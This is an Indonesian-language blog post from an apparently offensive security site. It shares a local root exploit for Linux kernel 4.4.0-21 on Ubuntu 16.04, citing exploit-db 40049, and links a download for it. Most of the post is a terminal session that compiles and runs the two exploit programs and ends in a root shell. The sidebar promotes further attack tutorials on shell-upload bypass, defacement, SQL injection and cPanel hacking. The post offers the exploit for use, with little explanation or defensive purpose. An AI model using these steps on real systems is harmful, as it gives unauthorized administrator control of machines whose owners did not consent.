• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) Privilege Escalation

September 19, 2016 by Jack Wilder 1 Comment

Holaa.. kali ini mau share aja barangkali ada yang belom tau. Localroot kernel 4.4.0-21 (xenial) 64 bit.

vnik@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr
vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn
vnik@ubuntu:~$ ./decr
netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik
[!] Decrementing the refcount. This may take a while…
[!] Wait for the “Done” message (even if you’ll get the prompt back).
vnik@ubuntu:~$ [+] Done! Now run ./pwn

vnik@ubuntu:~$ ./pwn
[+] Escalating privs…
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# 

Download :
Linux Kernel 4.4.0-21 (Ubuntu 16.04 x64) Privilege Escalation
Ref :
https://www.exploit-db.com/exploits/40049/
Shares

Filed Under: Uncategorized Tagged With: Exploit, Linux, Localroot, Ubuntu

Reader Interactions

Comments

  1. muhammad sibli says

    October 30, 2016 at 2:08 pm

    ini untuk apa ya? dan cara pakainya gmana?

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

DNS Hijacking through Social Engineering

RCE pada Redis via Master-Slave Replication

FCKeditor Bypass Shell Upload With Burp Suite Intercept

Prestashop Module Blocktestimonial File Upload Auto Exploit

Tutorial Hack WHM dan cPanel dengan WHMCS Killer

MIME Type Sniffing pada Form Upload Gambar

Deface dengan Metode Timthumb Remote Code Execution

MyBB 1.8.x SQL Injection Auto Exploit

Laravel PHPUnit Remote Code Execution

FastMail Custom Domain or Subdomain Takeover

LinuxSec / 85 queries in 0.21 seconds